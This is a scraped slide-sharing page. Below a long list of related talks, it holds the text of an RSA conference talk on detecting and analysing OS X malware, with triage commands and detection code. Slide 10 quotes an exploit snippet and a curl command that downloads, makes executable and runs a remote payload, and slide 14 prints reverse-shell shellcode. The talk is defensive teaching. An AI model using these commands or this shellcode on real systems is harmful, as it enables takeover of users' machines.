DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector
 
Csw2016 economou nissim-getting_physical
Csw2016 economou nissim-getting_physicalCsw2016 economou nissim-getting_physical
Csw2016 economou nissim-getting_physical
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
 
Hack any website
Hack any websiteHack any website
Hack any website
 
BSidesSF 2016 - A year in the wild: fighting malware at the corporate level
BSidesSF 2016 - A year in the wild: fighting malware at the corporate levelBSidesSF 2016 - A year in the wild: fighting malware at the corporate level
BSidesSF 2016 - A year in the wild: fighting malware at the corporate level
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 

Andere mochten auch

Synack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningSynack
 
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...Synack
 
Giver (archetypes)
Giver (archetypes)Giver (archetypes)
Giver (archetypes)Xiao Yun
 
Ad hoc on demand distance
Ad hoc on demand distanceAd hoc on demand distance
Ad hoc on demand distanceJimit Rupani
 
Come scegliere l'album di matrimonio?
Come scegliere l'album di matrimonio?Come scegliere l'album di matrimonio?
Come scegliere l'album di matrimonio?Marco Gabriella
 
istilah-istilah jaringan internet dalam komputer
istilah-istilah jaringan internet dalam komputeristilah-istilah jaringan internet dalam komputer
istilah-istilah jaringan internet dalam komputerAbednego Ringgo
 
преимущества и недостатки интернета
преимущества и недостатки интернетапреимущества и недостатки интернета
преимущества и недостатки интернетаAy_sel
 
Crack the Consumer Code
Crack the Consumer CodeCrack the Consumer Code
Crack the Consumer CodePlaceable
 

Andere mochten auch (16)

Synack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack cirtical infrasructure webinar
Synack cirtical infrasructure webinar
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanning
 
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
 
Giver (archetypes)
Giver (archetypes)Giver (archetypes)
Giver (archetypes)
 
Sips structrual insulated panels
Sips structrual insulated panelsSips structrual insulated panels
Sips structrual insulated panels
 
TAPipedia User Tutorial
TAPipedia User TutorialTAPipedia User Tutorial
TAPipedia User Tutorial
 
400 blows
400 blows400 blows
400 blows
 
Ad hoc on demand distance
Ad hoc on demand distanceAd hoc on demand distance
Ad hoc on demand distance
 
Osb eps osb structural insulated panels
Osb eps osb structural insulated panelsOsb eps osb structural insulated panels
Osb eps osb structural insulated panels
 
Come scegliere l'album di matrimonio?
Come scegliere l'album di matrimonio?Come scegliere l'album di matrimonio?
Come scegliere l'album di matrimonio?
 
istilah-istilah jaringan internet dalam komputer
istilah-istilah jaringan internet dalam komputeristilah-istilah jaringan internet dalam komputer
istilah-istilah jaringan internet dalam komputer
 
me
meme
me
 
преимущества и недостатки интернета
преимущества и недостатки интернетапреимущества и недостатки интернета
преимущества и недостатки интернета
 
Crack the Consumer Code
Crack the Consumer CodeCrack the Consumer Code
Crack the Consumer Code
 
Log
LogLog
Log
 
Mgo eps mgo structural insulated panels
Mgo eps mgo structural insulated panelsMgo eps mgo structural insulated panels
Mgo eps mgo structural insulated panels
 

Ähnlich wie Session ID: Let’s Play Doctor

Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharySaurav Chaudhary
 
Sandbox Technology in AntiVirus
Sandbox Technology in AntiVirusSandbox Technology in AntiVirus
Sandbox Technology in AntiVirusAshish Gautam
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry moreBHack Conference
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceIvan Einstein
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bugvwchu
 
2600 v03 n07 (july 1986)
2600 v03 n07 (july 1986)2600 v03 n07 (july 1986)
2600 v03 n07 (july 1986)Felipe Prado
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentStefano Maccaglia
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionWayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
Adversary tactics config mgmt-&amp;-logs-oh-my
Adversary tactics config mgmt-&amp;-logs-oh-myAdversary tactics config mgmt-&amp;-logs-oh-my
Adversary tactics config mgmt-&amp;-logs-oh-myJesse Moore
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIMAlienVault
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Stefano Maccaglia
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-macCyphort
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 

Ähnlich wie Session ID: Let’s Play Doctor (20)

Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudhary
 
Sandbox Technology in AntiVirus
Sandbox Technology in AntiVirusSandbox Technology in AntiVirus
Sandbox Technology in AntiVirus
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware Persistence
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bug
 
2600 v03 n07 (july 1986)
2600 v03 n07 (july 1986)2600 v03 n07 (july 1986)
2600 v03 n07 (july 1986)
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
Adversary tactics config mgmt-&amp;-logs-oh-my
Adversary tactics config mgmt-&amp;-logs-oh-myAdversary tactics config mgmt-&amp;-logs-oh-my
Adversary tactics config mgmt-&amp;-logs-oh-my
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
 
Security Handbook
Security Handbook Security Handbook
Security Handbook
 
Understand study
Understand studyUnderstand study
Understand study
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-mac
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing You
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 

Kürzlich hochgeladen

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 

Kürzlich hochgeladen (20)

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 

Session ID: Let’s Play Doctor

  • 1. SESSION ID: Let’s Play Doctor
 Prac/cal OS X Malware Detec/on & Analysis HTA-W03F Patrick Wardle Director of Research at Synack
 @patrickwardle
  • 2. WHOIS “leverages the best combina1on of humans and technology to discover security vulnerabili1es in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” @patrickwardle security for the 21st century career hobby
  • 3. OUTLINE steps to a happier, healthier 2016 outbreaks diagnos:cs analysis health & happiness virology } @thomasareed @claud_xiao @osxreverser thanks & credit
  • 4. PART 0X1: OUTBREAKS overview of recent OS X malware specimens
  • 5. MALWARE ON OS X yes; it exists and is geSng more prevalent “It doesn’t get PC viruses. A Mac isn’t suscep1ble to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) 2014: "nearly 1000 unique aMacks on Macs; 25 major families" -kasperksy 2015: "The most prolific year in history for OS X malware...5x more OS X malware appeared in 2015 than during the previous five years combined" 
 -bit9 2015: OS X most vulnerable soEware by CVE count -cve details
  • 6. OS X/IWORM ‘standard’ backdoor, providing survey, download/execute, etc. # fs_usage -w -f filesys 20:28:28.727871 open /Library/LaunchDaemons/com.JavaW.plist 20:28:28.727890 write B=0x16b launch daemon survey download execute persis:ng infected torrents launch daemon plist
  • 7. OS X/CRISIS (RCSMAC) hackingteam's implant; collect all things! launch agent rootkit component persistence (leaked source code) intelligence collec:on “HackingTeam Reborn; 
 Analysis of an RCS Implant Installer"
  • 8. OS X/XCODEGHOST applica/on infector $ less Xcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/ Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec
 ... Name = ALL_OTHER_LDFLAGS; DefaultValue = "$(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $ (OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS) 
 -force_load $(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServices"; modified LD.xcspec file source compile app store infected :( infected app app installed
  • 9. } OS X/GENIEO (INKEEPR) most prolific os x adware browser extension(s) fake installers bundled with apps ADs
  • 10. OS X/BACKDOOR(?) bot/backdoor that exploits MacKeeper <script> window.location.href = 'com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/<BASE_64_ENCODED_STUB>'; ... "[a] flaw in MacKeeper's URL handler implementa1on allows arbitrary remote code execu1on when a user visits a specially cra]ed webpage" -bae systems exploit & payload launch agent curl -A 'Safari' -o /Users/Shared/dufh http://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr; chmod 755 /Users/Shared/dufh; cd /Users/Shared; ./dufh shell download executesurvey
  • 11. OS X/CARETO ('MASK') ‘cyber-espionage backdoor' launch agent [~/Library/LaunchAgents/ com.apple.launchport.plist] lea rdi, encodedServer ; "x16dn~x1AcM!"... mov rsi, decodedServer call __Dcd ... mov rdi, decodedServer mov esi, cs:_port call _sbd_connect $ lldb OSX_Careto (lldb) target create "OSX_Careto" Current executable set to 'OSX_Careto' (x86_64).'' 
 (lldb) b _Dcd Breakpoint 1: where = OSX_Careto`_Dcd,
 ... $ (lldb) x/s decodedServer 0x100102b40: "itunes212.appleupdt.com" disassembly debugging (decoding C&C) encoded strings phishing/exploits
  • 12. PART 0X2: VIROLOGY study of os x malware characteris/cs & commonali/es
  • 13. INFECTION VECTORS method 0x1: via user-interac/on fake codecs fake installers/updates infected torrents rogue "AV" products ??? poor naive users
  • 14. INFECTION VECTORS method 0x2: exploits "interested in buying zero-day vulnerabili1es with RCE exploits for the latest versions of ...Safari? ...exploits allow to embed and remote execute custom payloads and demonstrate modern [exploita1on] techniques on OS X" 
 -V. Toropov (email to hackingteam) how the real hackers do it } ;OSX x64 reverse tcp shell (131 bytes, shell-storm.org) ;"x41xB0x02x49xC1xE0x18x49x83xC8x61x4Cx89xC0x48" + ;"x31xD2x48x89xD6x48xFFxC6x48x89xF7x48xFFxC7x0F" + ;"x05x49x89xC4x49xBDx01x01x11x5CxFFxFFxFFxFFx41" + ;"xB1xFFx4Dx29xCDx41x55x49x89xE5x49xFFxC0x4Cx89" + ;"xC0x4Cx89xE7x4Cx89xEEx48x83xC2x10x0Fx05x49x83" + ;"xE8x08x48x31xF6x4Cx89xC0x4Cx89xE7x0Fx05x48x83" + ;"xFEx02x48xFFxC6x76xEFx49x83xE8x1Fx4Cx89xC0x48" + ;"x31xD2x49xBDxFFx2Fx62x69x6Ex2Fx73x68x49xC1xED" + ;"x08x41x55x48x89xE7x48x31xF6x0Fx05"
  • 15. PERSISTENCE many op/ons, few used launchdaemons&agents userloginitems browserextensions&plugins [RSA2015]
 "Malware Persistence on OS X" ~20 techniques
  • 16. FEATURES dependent on the goals of the malware [ criminal ] [ espionage ] shell video audio ads clicks money keylogs surveys downloads exec's
  • 17. SUMMARY the current state of OS X malware crime espionage persistence psp bypassself-defense features ‣ well known methods ‣ majority: launch items ‣ minimal obfusca:on ‣ trivial to detect/remove ‣ poorly implemented ‣ suffice for the job ‣ occasional an:-AV ‣ no psp detec:on stealth ‣ 'hide' in plain site ‣ rootkits? not common infec:on ‣ trojans/phishing ‣ some exploits
  • 18. PART 0X3: DIAGNOSTICS are you possibly infected?
  • 19. VISUALLY OBSERVABLE INDICATORS more ohen than not, you're not infected... unlikelymalware possiblymalware "mycomputeris soslow" "itkeepscrashing" ADs "somanyprocesses" "therearetonsofpopups" "mycomputersaysitsinfected "myhomepageandsearch engineareweird" most not trivially observable!
  • 20. VISUALLY OBSERVABLE INDICATORS generic alerts may indicate the presence of malware persistence(BlockBlock) networkaccess(LittleSnitch) note:suchtoolsdonotattempttodirectlydetectmalwareper-se…
  • 21. STEP 0X1: KNOWN MALWARE any known malware running on your system? TaskExplorer(+virustotalintegration) VT ratios
  • 22. STEP 0X2: SUSPICIOUS PROCESSES any unrecognized binaries running on your system? unsignedtasks “globalsearch”for: 3rd-partytasks unsigned "apple" unrecognized(byVT) suspicious! + +
  • 23. STEP 0X3: SUSPICIOUS PERSISTENCE any unrecognized binaries persis/ng on your system? KnockKnock;enum.persistence unsigned "apple" suspicious! asuspiciouslaunchitem unrecognized(byVT) + +
  • 24. STEP 0X4: NETWORK I/O odd ports or unrecognized connec/ons? # sudo lsof -i | grep ESTABLISHED apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) com.apple 1168 user TCP 172.16.44.128:49511->bd044252.virtua.com.br:https (ESTABLISHED) JavaW 1184 root TCP 172.16.44.128:49532->188.167.254.92:51667 (ESTABLISHED) iWorm('JavaW')listeningforattackerconnection or 'established' for connected sessions iWormconnectedtoc&cserver
  • 25. STEP 0X5: SUSPICIOUS KEXTS, HIJACKED DYLIBS, ETC. countless other things to look for.... uncheck ‘'Show OS Kexts' anysuspiciouskernelextensions? hijackeddylibs? [DefCon 2015] "DLL Hijacking on OS X? #@%& Yeah!"
  • 26. PART 0X4: ANALYSIS determine if something is malicious....or not!?
  • 27. CODE-SIGNING examine the binary’s code signature $ codesign -dvv /usr/lib/libtidy.A.dylib 
 Format=Mach-O universal (i386 x86_64)
 Authority=Software Signing Authority=Apple Code Signing Certification Authority Authority=Apple Root CA libtidy is signed by apple proper codesign -dvv OSX_Careto 
 OSX_Careto: code object is not signed at all most malware; unsigned signed by apple: not malware! libtidy dylib flagged by VT usecodesigntodisplaya binary’ssigninginfo ex:$ codesign -dvv <file>
  • 28. GOOGLE THE HASH may (quickly) tell you; known good || known bad $ md5 appleUpdater MD5 (appleUpdater) = 2b30e1f13a648cc40c1abb1148cf5088 unknown hash ….might be odd ‣ 3rd-partybinaries,mayproduce zerohitsongoogle ‣ 0%detectiononvirustotaldoesn’t mean100%notmalware known hash (OSX/Careto)
  • 29. STRINGS quickly triage a binary’s func/onality $ strings -a OSX_Careto
 reverse lookup of %s failed: %s bind(): %s connecting to %s (%s) [%s] on port %u executing: %s
 cM!M> `W9_c [0;32m strings;osx/careto networking& execlogic encodedstrings $ strings -a JavaW 
 $Info: This file is packed with the UPX executable packer $Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. strings; iWorm usewiththe-aflag packed(UPX) googleinterestingstrings
  • 30. FILE ATTRIBUTES OS X na/vely support encrypted binaries ourhardworkbythese wordsguardedplease dontsteal(c)AppleC encrypted with Blowfish disassembling Finder.app encryp:ng the malware $ strings -a myMalware infectUser: ALOHA RSA! $ ./protect myMalware encrypted 'myMalware' $ strings -a myMalware 
 n^jd[P5{Q r_`EYFaJq07 known malware: ~50% drop VT detection
  • 31. FILE ATTRIBUTES detec/ng encrypted binaries //check all load commands for(int i = 0; i<[machoHeader[LOAD_CMDS] count]; i++) { //grab load command loadCommand = [machoHeader[LOAD_CMDS] pointerAtIndex:i];
 //check text segment if(0 == strncmp(loadCommand->segname, SEG_TEXT, sizeof(loadCommand->segname)) { //check if segment is protected if(SG_PROTECTED_VERSION_1 == (loadCommand->flags & SG_PROTECTED_VERSION_1)) { //FILE IS ENCRYPTED detec:ng encryp:on TaskExplorer }unsigned encrypted +
  • 32. FILE ATTRIBUTES malware is ohen packed to 'hinder' detec/on/analysis $ strings -a JavaW
 
 Info: This file is packed with the UPX executable packer http://upx.sf.net Id: UPX 3.09 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. iWorm(JavaW);packed //count all occurrences for(NSUInteger i = 0; i < length; i++) occurrences[0xFF & (int)data[i]]++; //calc entropy for(NSUInteger i = 0; 
 i < sizeof(occurrences)/sizeof(occurrences[0]); i++) { //add occurrences to entropy if(0 != occurrences[i]) { //calc ratio pX = occurrences[i]/(float)length; //cumulative entropy entropy -= pX*log2(pX); } TaskExplorer genericpackerdetectionalgorithm viewallpackedtasks/dylibs
  • 33. CLASSDUMP extract class names, methods, & more... $ class-dump RCSMac.app
 
 @interface __m_MCore : NSObject { NSString *mBinaryName; NSString *mSpoofedName; } - (BOOL)getRootThroughSLI;
 - (BOOL)isCrisisHookApp:(id)arg1;
 - (BOOL)makeBackdoorResident; - (void)renameBackdoorAndRelaunch;
 @end rcsmac(osx/crisis) $ class-dump Installer.app
 
 @interface ICDownloader : 
